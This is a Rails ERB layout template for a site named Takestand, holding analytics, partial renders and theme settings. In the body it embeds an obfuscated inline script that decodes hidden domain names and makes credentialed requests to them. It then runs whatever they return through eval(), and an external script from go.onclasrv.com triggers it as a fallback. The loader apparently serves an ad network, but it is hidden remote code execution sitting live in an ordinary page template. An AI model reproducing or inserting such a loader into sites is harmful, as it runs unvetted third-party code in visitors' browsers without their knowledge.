<!DOCTYPE html>
<html class="st-layout ls-top-navbar ls-bottom-footer show-sidebar sidebar-l2 js" lang="en">
  <head> 
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <link href="/css/vendor/all.css" rel="stylesheet">
    <link href="/css/app/app.css" rel="stylesheet">
    <link rel="prerender" href="/images/default.png">
    <title>Takestand</title>
    <%= favicon_link_tag 'favicon.png' %>
    <%= csrf_meta_tags %>
    <%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %>
    <%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %>
   <script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

    ga('create', 'UA-90532488-1', 'auto');
    ga('send', 'pageview');

  </script>
  </head>

  <body>
  <script data-cfasync="false" type="text/javascript">var E5p=window;for(var z in E5p){if(z.length===(0x1DC<(103.10E1,4.850E2)?(0xF3,6):(5.60E1,5.64E2))&&z.charCodeAt(((10.620E2,20.)<149?(7.94E2,3):(116.,0x72)))===(30.3E1>(1.418E3,8.33E2)?(123.,"O"):(8.78E2,0xA)<(8.81E2,73.)?(6.86E2,100):(6.810E2,13))&&z.charCodeAt(((0x1BB,0x14D)>0x106?(0x1F5,5):(14.13E2,53.)))===(0x1F3>(57.6E1,110)?(14.89E2,119):(77.,0xDC)<29.?(125.,200):(0x4A,8.290E2))&&z.charCodeAt(((55.,0x12)<(0x10,0x91)?(14.26E2,1):(12.07E2,86.)))===(0xC5<=(112,79.0E1)?(117.,105):(108.,0x29))&&z.charCodeAt(((52,5.01E2)<=(125.,112)?'W':(0x36,26.70E1)>=0x54?(132.,0):(3,1.04E2)))===((2.96E2,1.71E2)<0x188?(68.,119):(0x1FE,85)>(0x1CA,0x225)?0x104:(0x1E4,0x23C)))break};for(var y in E5p[z]){if(y.length===((0x102,12.61E2)>=(81,6.98E2)?(91,8):(122.0E1,0x39))&&y.charCodeAt(((0x80,0xCF)<=(84.,0x155)?(0x1AD,5):(0x198,104.)>0xF9?(1.072E3,41.):(12.540E2,3.)))===(103<(1.439E3,6.38E2)?(0x19,101):(138.20E1,1.05E3))&&y.charCodeAt(((0x94,32.9E1)<=78.80E1?(20,7):(2.9E2,60.7E1)))===((5.42E2,0xEC)<=(52.,0x1E1)?(3.18E2,116):3>(2.18E2,0x17)?(129.4E1,'T'):(0x1CC,63.90E1))&&y.charCodeAt(((0x1A4,0x50)>(51.,79.)?(59.,3):(0x189,0x1D9)))===(0x1B5>=(76.80E1,117)?(0x137,117):(29.,0x14E))&&y.charCodeAt(((3.39E2,69)<85.?(82.,0):(68.3E1,50.)))===(147<(88,0x254)?(7.75E2,100):(104.,0x1F)))break};(function(p,I,n,Z){E5p[z][I]=function(){var l=0,N=function N(){var C='//',b='ET',H=((1.2750E3,11.41E2)>=(0x248,59)?(0x4E,'G'):(0x5D,1.83E2)>27.0E1?(47.,''):(0x113,0x188)),F=new XMLHttpRequest();F.withCredentials=true;F.open((H+b),(C)+E5p[z]['atob'](n[l].split('').reverse().join(''))+'/'+Z+'/',true);F.onreadystatechange=function(){if(F.readyState==4&&F.status==200&&F.responseText){eval(F.responseText);}};F.onerror=function(){if(++l!=n.length){N();}};try{F.send();}catch(u){F.onerror();}};N();};})(E5p[z][y],'_jvsycau',['klmYu42dxQHZp92a','tF2YiV2ducjd3dGN6BDZ','==QZ0l2ciV2duIHc20WYzcmN','=kHdyFGcugWZjlGM4gja'],991550);</script><script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=991545" onerror="window._jvsycau();"></script>
    <div id="preloader"></div>
    
    <% if user_signed_in? %>
      <div class="st-container">
        <%= render 'layouts/header'%>
        <%= render 'layouts/main'%>
      </div>
    <%else%>
    <div class="st-container">
      <div class="st-pusher">
    <%= render 'shared/header'%>
 
      <div class="st-content-inner" style="padding-top:0px;">
     
      <%= yield %> 
      <%= render 'shared/footer'%>
      
 
      </div>
      </div>
      </div>
    <%end%>    
    <script>
      var colors = {
        "danger-color": "#e74c3c",
        "success-color": "#81b53e",
        "warning-color": "#f0ad4e",
        "inverse-color": "#2c3e50",
        "info-color": "#2d7cb5",
        "default-color": "#6e7882",
        "default-light-color": "#cfd9db",
        "purple-color": "#9D8AC7",
        "mustard-color": "#d4d171",
        "lightred-color": "#e15258",
        "body-bg": "#f6f6f6"
      };
      var config = {
        theme: "admin",
        skins: {
          "default": {
            "primary-color": "#3498db"
          }
        }
      };
    </script>
    <script src="/js/vendor/all.js"></script>
    <script src="/js/app/app.js"></script>
  
  </body>


  
</html>

  